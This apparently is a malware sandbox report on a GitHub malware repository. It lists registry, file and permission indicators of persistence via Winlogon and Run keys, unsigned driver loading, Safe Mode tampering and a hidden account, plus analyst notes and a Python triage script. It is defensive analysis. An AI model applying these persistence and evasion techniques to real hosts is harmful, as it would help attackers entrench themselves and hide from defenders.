Analysis Overview
Threat Level: Known bad
The file https://github.com/Da2dalus/The-MALWARE-Repo was found to be: Known bad.
Malicious Activity Summary
Wipelock
Wipelock Android payload
Modifies WinLogon for persistence
Grants admin privileges
Remote Service Session Hijacking: RDP Hijacking
Manipulates Digital Signatures
Office macro that triggers on suspicious action
Sets file to hidden
Modifies Windows Firewall
Suspicious Office macro
Sets service image path in registry
Executes dropped EXE
Impair Defenses: Safe Mode Boot
Enumerates connected drives
Adds Run key to start application
Declares broadcast receivers with permission to handle system events
Declares services with permission to bind to the system
Password Policy Discovery
Requests dangerous framework permissions
Drops file in System32 directory
Hide Artifacts: Hidden Users
Launches sc.exe
Drops file in Windows directory
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Browser Information Discovery
Event Triggered Execution: Netsh Helper DLL
Program crash
Permission Groups Discovery: Local Groups
Suspicious use of FindShellTrayWindow
Modifies Internet Explorer start page
Opens file in notepad (likely ransom note)
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Checks processor information in registry
Suspicious behavior: LoadsDriver
Modifies registry class
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of SendNotifyMessage
NTFS ADS
Modifies Internet Explorer settings
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Views/modifies file attributes
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-12 20:19
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-12 20:19
Reported
2024-08-12 20:32
Platform
win11-20240802-en
Max time kernel
729s
Max time network
440s
Command Line
Signatures
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit32.exe" | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
Note: the value was written under WOW6432Node because the 32-bit sample is subject to registry redirection, and the referenced binary was actually dropped at C:\Windows\SysWOW64\userinit32.exe (see "Drops file in System32 directory" below) because of file-system redirection. 64-bit winlogon.exe reads the native Winlogon key and the real System32, so on this x64 host the Userinit hijack is recorded but is unlikely to execute at logon. Verify the native HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit value on an affected host regardless; the default is userinit.exe followed by a trailing comma.
Wipelock
Wipelock Android payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Grants admin privileges
Remote Service Session Hijacking: RDP Hijacking
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\net.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\net1.exe | N/A |
Manipulates Digital Signatures
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\trust | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPublisher\CTLs | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPublisher | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPublisher\CRLs | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPublisher\Certificates | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
Note: every key deleted here lives under SOFTWARE\Policies, i.e. the Group Policy copies of the TrustedPublisher, TrustedPeople and trust stores (certificates, CTLs and CRLs pushed by policy). The machine's own stores under SOFTWARE\Microsoft\SystemCertificates are not touched in this list, so the effect is removal of policy-distributed trust settings rather than tampering with the sample's own signature.
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Office macro that triggers on suspicious action
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\qpqpozmwyablbpbwj\ImagePath = "\\??\\C:\\Users\\Admin\\Desktop\\New folder\\ac\\qpqpozmwyablbpbwj.sys" | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\zzsqebewkrhila\ImagePath = "\\??\\C:\\Users\\Admin\\Desktop\\New folder\\ac\\zzsqebewkrhila.sys" | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssqlaq\ImagePath = "\\??\\C:\\Users\\Admin\\Desktop\\New folder\\ac\\mssqlaq.sys" | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssql\ImagePath = "\\??\\C:\\Users\\Admin\\Desktop\\New folder\\ac\\mssql.sys" | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\igvfpxuxmkoorey\ImagePath = "\\??\\C:\\Users\\Admin\\Desktop\\New folder\\ac\\igvfpxuxmkoorey.sys" | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\utdrkgojlbyxehfm\ImagePath = "\\??\\C:\\Users\\Admin\\Desktop\\New folder\\ac\\utdrkgojlbyxehfm.sys" | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\nelejskklawzyyeyf\ImagePath = "\\??\\C:\\Users\\Admin\\Desktop\\New folder\\ac\\nelejskklawzyyeyf.sys" | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\vngoaccjxrjwij\ImagePath = "\\??\\C:\\Users\\Admin\\Desktop\\New folder\\ac\\vngoaccjxrjwij.sys" | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\kctlwwixkqmsfr\ImagePath = "\\??\\C:\\Users\\Admin\\Desktop\\New folder\\ac\\kctlwwixkqmsfr.sys" | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
Note: mssql.exe registers nine kernel drivers (.sys) under randomly generated service names, all with image paths inside the sample's own folder rather than System32\drivers; this pairs with the "Suspicious behavior: LoadsDriver" signature above. Whether the loads succeeded is not shown here: on Windows 11 with driver signature enforcement an unsigned driver from a user-writable path will be rejected unless the machine runs with test signing enabled.
Suspicious Office macro
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\New folder\ac\nc123.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New folder\ac\mssql2.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New folder\ac\EVER\SearchHost.exe | N/A |
Impair Defenses: Safe Mode Boot
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\NELEJSKKLAWZYYEYF.SYS | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\zzsqebewkrhila.sys | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\KCTLWWIXKQMSFR.SYS | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\CBDHSvc | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\SerCx2.sys | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\igvfpxuxmkoorey.sys | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\utdrkgojlbyxehfm.sys | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\UTDRKGOJLBYXEHFM.SYS | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\vngoaccjxrjwij.sys | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\VNGOACCJXRJWIJ.SYS | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Power | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\iai2c.sys | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\IGVFPXUXMKOOREY.SYS | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\qpqpozmwyablbpbwj.sys | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\QPQPOZMWYABLBPBWJ.SYS | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\nelejskklawzyyeyf.sys | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\ZZSQEBEWKRHILA.SYS | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\kctlwwixkqmsfr.sys | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\UserManager | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\ProfSvc | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
Note: two different behaviours share this signature. mssql.exe creates SafeBoot\Minimal entries for its own randomly named drivers (and later deletes them again), which would let those drivers load even when the machine is booted into Safe Mode. Fagot.a.exe instead deletes entries for stock components (CBDHSvc, SerCx2.sys, Power, iai2c.sys, UserManager, ProfSvc); that removes nothing belonging to the malware and degrades or breaks Safe Mode boot, which is the "Impair Defenses" part of the technique.
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\dllhost32 = "C:\\Windows\\system32\\dllhost32.exe" | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
Note: unlike the Winlogon key, the WOW6432Node Run key is processed at logon on 64-bit Windows, so this entry will be attempted. The value names C:\Windows\system32\dllhost32.exe, but the file was dropped at C:\Windows\SysWOW64\dllhost32.exe (file-system redirection of the 32-bit writer); a 64-bit Explorer resolves the literal path in the real System32, so check whether a dllhost32.exe exists there before concluding the persistence is live. The name is chosen to blend in with the legitimate dllhost.exe.
Declares broadcast receivers with permission to handle system events
| Description | Indicator | Process | Target |
| Required by device admin receivers to bind with the system. Allows apps to manage device administration features. | android.permission.BIND_DEVICE_ADMIN | N/A | N/A |
| Required by device admin receivers to bind with the system. Allows apps to manage device administration features. | android.permission.BIND_DEVICE_ADMIN | N/A | N/A |
Declares services with permission to bind to the system
| Description | Indicator | Process | Target |
| Required by wallpaper services to bind with the system. Allows apps to provide live wallpapers. | android.permission.BIND_WALLPAPER | N/A | N/A |
| Required by wallpaper services to bind with the system. Allows apps to provide live wallpapers. | android.permission.BIND_WALLPAPER | N/A | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | C:\Users\Admin\Desktop\New folder\ac\EVER\SearchHost.exe | N/A |
Password Policy Discovery
Requests dangerous framework permissions
| Description | Indicator | Process | Target |
| Allows an application to write to external storage. | android.permission.WRITE_EXTERNAL_STORAGE | N/A | N/A |
| Allows an application to initiate a phone call without going through the Dialer user interface for the user to confirm the call. | android.permission.CALL_PHONE | N/A | N/A |
| Allows an application to write to external storage. | android.permission.WRITE_EXTERNAL_STORAGE | N/A | N/A |
| Allows an application to read from external storage. | android.permission.READ_EXTERNAL_STORAGE | N/A | N/A |
| Allows read only access to phone state, including the current cellular network information, the status of any ongoing calls, and a list of any PhoneAccounts registered on the device. | android.permission.READ_PHONE_STATE | N/A | N/A |
| Allows an application to receive SMS messages. | android.permission.RECEIVE_SMS | N/A | N/A |
| Allows an application to send SMS messages. | android.permission.SEND_SMS | N/A | N/A |
| Allows an application to read SMS messages. | android.permission.READ_SMS | N/A | N/A |
| Allows an application to read the user's contacts data. | android.permission.READ_CONTACTS | N/A | N/A |
| Allows an application to read from external storage. | android.permission.READ_EXTERNAL_STORAGE | N/A | N/A |
| Allows an application to write to external storage. | android.permission.WRITE_EXTERNAL_STORAGE | N/A | N/A |
| Allows an application to read or write the system settings. | android.permission.WRITE_SETTINGS | N/A | N/A |
| Allows an app to create windows using the type LayoutParams.TYPE_APPLICATION_OVERLAY, shown on top of all other apps. | android.permission.SYSTEM_ALERT_WINDOW | N/A | N/A |
| Allows an application to write to external storage. | android.permission.WRITE_EXTERNAL_STORAGE | N/A | N/A |
| Allows an application to read from external storage. | android.permission.READ_EXTERNAL_STORAGE | N/A | N/A |
| Allows read only access to phone state, including the current cellular network information, the status of any ongoing calls, and a list of any PhoneAccounts registered on the device. | android.permission.READ_PHONE_STATE | N/A | N/A |
| Allows an application to receive SMS messages. | android.permission.RECEIVE_SMS | N/A | N/A |
| Allows an application to send SMS messages. | android.permission.SEND_SMS | N/A | N/A |
| Allows an application to read SMS messages. | android.permission.READ_SMS | N/A | N/A |
| Allows an application to read the user's contacts data. | android.permission.READ_CONTACTS | N/A | N/A |
| Allows an application to read from external storage. | android.permission.READ_EXTERNAL_STORAGE | N/A | N/A |
| Allows an application to write to external storage. | android.permission.WRITE_EXTERNAL_STORAGE | N/A | N/A |
| Allows an application to read or write the system settings. | android.permission.WRITE_SETTINGS | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\windows\SysWOW64\logon.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\systray.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\win.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\wowexec.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\progman.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\progman.exe:Zone.Identifier:$DATA | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\ntoskrnl.exe:Zone.Identifier:$DATA | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\alg.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\ctfmon.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\dumprep.exe:Zone.Identifier:$DATA | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\logon.exe:Zone.Identifier:$DATA | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\MDM.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\services.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\userinit32.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\userinit32.exe:Zone.Identifier:$DATA | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\dumprep.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\bootok.exe:Zone.Identifier:$DATA | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\imapi.exe:Zone.Identifier:$DATA | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\MDM.exe:Zone.Identifier:$DATA | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\recover.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\dllhost32.exe:Zone.Identifier:$DATA | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\ntoskrnl.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\ntkrnlpa.exe:Zone.Identifier:$DATA | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\chkntfs.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\wuauclt.exe:Zone.Identifier:$DATA | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\WINDOWS\SysWOW64\userinit.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\regedit.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\autochk.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\chcp.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\wuauclt.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\dllhost32.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\shutdown.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\alg.exe:Zone.Identifier:$DATA | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\services.exe:Zone.Identifier:$DATA | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\userinit32.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\ntkrnlpa.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\bootok.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\wowexec.exe:Zone.Identifier:$DATA | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\chcp.exe:Zone.Identifier:$DATA | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\imapi.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\win.exe:Zone.Identifier:$DATA | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
Note: all of these files land in SysWOW64, not System32, because the 32-bit sample is redirected. Several of the names (ntoskrnl.exe, ntkrnlpa.exe, services.exe, alg.exe, ctfmon.exe, userinit.exe, wuauclt.exe) mimic stock Windows binaries, so a copy of any of them under SysWOW64 with a non-Microsoft signature is a usable indicator. The :Zone.Identifier:$DATA rows (the "NTFS ADS" signature) are Mark-of-the-Web streams carried along when the sample copies itself; they show the dropper was itself MOTW-tagged rather than data being hidden in alternate streams.
Hide Artifacts: Hidden Users
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\systembackup = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Note: a UserList value of 0 hides the named account from the logon screen. The name systembackup suggests an attacker-created account, and the net.exe / net1.exe activity listed under "RDP Hijacking" is consistent with account creation, but command lines are not recorded in this report. The write was made by 32-bit reg.exe and landed under WOW6432Node, whereas the logon UI reads the native Winlogon\SpecialAccounts\UserList key, so confirm with net user and the native key before treating the account as hidden.
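The registry rows in the "Modifies WinLogon for persistence", "Sets service image path in registry", "Impair Defenses: Safe Mode Boot", "Adds Run key to start application" and "Hide Artifacts: Hidden Users" tables above are the ones an analyst acts on first. The script below is an added triage example, not part of the sandbox report or of the analysed repository: it parses rows in the report's own table format, turns the registry writes into ranked findings, and applies the 32-bit redirection caveat (a WOW6432Node path means the native key was not modified). The sample rows are copied from the tables above; the ATT&CK ids, severities and the "trusted image path" prefixes are my assumptions, and the "Key opened" NetSh row is included as a negative case that must produce no finding.

```python
from dataclasses import dataclass
from typing import Optional

# Constructed sample input: rows copied from the signature tables in the report above.
SAMPLE_ROWS = r"""
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit32.exe" | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssql\ImagePath = "\\??\\C:\\Users\\Admin\\Desktop\\New folder\\ac\\mssql.sys" | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\zzsqebewkrhila.sys | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\ProfSvc | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\dllhost32 = "C:\\Windows\\system32\\dllhost32.exe" | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\systembackup = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
"""

@dataclass
class RegEvent:
    action: str            # "Set value (str)", "Key created", "Key deleted", "Key opened", ...
    path: str              # key path, or key\valuename for "Set value" rows
    data: Optional[str]    # value data with the report's doubled backslashes collapsed
    process: str

@dataclass
class Finding:
    technique: str         # ATT&CK id (assumed mapping from the signature names above)
    severity: str
    detail: str
    event: RegEvent

def parse_rows(text: str) -> list:
    """Extract registry events from '| Description | Indicator | Process | Target |' rows."""
    events = []
    for line in text.splitlines():
        parts = [p.strip() for p in line.strip().strip('|').split('|')]
        if len(parts) != 4 or parts[0] in ('Description', 'N/A'):
            continue
        action, indicator, process, _target = parts
        if not indicator.startswith('\\REGISTRY\\'):
            continue  # file rows and empty rows are out of scope here
        path, data = indicator, None
        if action.startswith('Set value') and ' = ' in indicator:
            path, raw = indicator.split(' = ', 1)
            data = raw.strip('"').replace('\\\\', '\\')
        events.append(RegEvent(action, path, data, process))
    return events

DEFAULT_USERINIT = 'c:\\windows\\system32\\userinit.exe,'          # stock value, note the comma
TRUSTED_IMAGE_PREFIXES = ('c:\\windows\\', '\\systemroot\\', 'system32\\')  # assumption

def _image_path(data: str) -> str:
    """Lower-case an ImagePath and drop the \\??\\ NT object-manager prefix."""
    d = data.lower()
    return d[4:] if d.startswith('\\??\\') else d

def triage(events: list) -> list:
    out = []
    for ev in events:
        p = ev.path.lower()
        name = p.rsplit('\\', 1)[-1]
        wow = '\\wow6432node\\' in p        # written by a 32-bit process via registry redirection
        setv = ev.action.startswith('Set value')
        data = (ev.data or '').lower()
        if setv and p.endswith('\\winlogon\\userinit') and data != DEFAULT_USERINIT:
            d = f'Userinit replaced with {ev.data}'
            if wow:
                d += '; landed in the 32-bit view, which 64-bit winlogon.exe does not read, so likely inert on x64'
            out.append(Finding('T1547.004', 'high', d, ev))
        elif setv and '\\currentversion\\run\\' in p:
            d = f'Run entry {name} -> {ev.data}'
            if wow and data.startswith('c:\\windows\\system32\\'):
                d += '; a 32-bit writer drops into SysWOW64, so confirm the file exists in the real System32'
            out.append(Finding('T1547.001', 'high', d, ev))
        elif setv and '\\specialaccounts\\userlist\\' in p and ev.data == '0':
            d = f'account {name} hidden from the logon screen'
            if wow:
                d += ' (32-bit view only; verify the native Winlogon key before concluding the user is hidden)'
            out.append(Finding('T1564.002', 'high', d, ev))
        elif setv and p.endswith('\\imagepath') and ev.data:
            img = _image_path(ev.data)
            if not img.startswith(TRUSTED_IMAGE_PREFIXES):
                kind = 'kernel driver' if img.endswith('.sys') else 'service binary'
                out.append(Finding('T1543.003', 'high', f'{kind} registered from user-writable path {img}', ev))
        elif '\\safeboot\\minimal\\' in p:
            if ev.action == 'Key created':
                out.append(Finding('T1562.009', 'medium', f'{name} allowed to load in Safe Mode', ev))
            elif ev.action == 'Key deleted':
                out.append(Finding('T1562.009', 'high', f'Safe Mode component {name} removed; safe boot may fail', ev))
    return out

def counts_by_technique(findings: list) -> dict:
    counts = {}
    for f in findings:
        counts[f.technique] = counts.get(f.technique, 0) + 1
    return counts

if __name__ == '__main__':
    for f in triage(parse_rows(SAMPLE_ROWS)):
        print(f'[{f.severity:6}] {f.technique} {f.detail}  <- {f.event.process}')
```

Running it over the seven sample rows yields six findings and nothing for the netsh.exe read. Feeding the whole report through parse_rows works the same way, since the row format is identical across all signature tables; the redirection caveats are what separate "recorded in the sandbox" from "would survive a reboot on a real x64 host".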
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\NOTEPAD.EXE | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
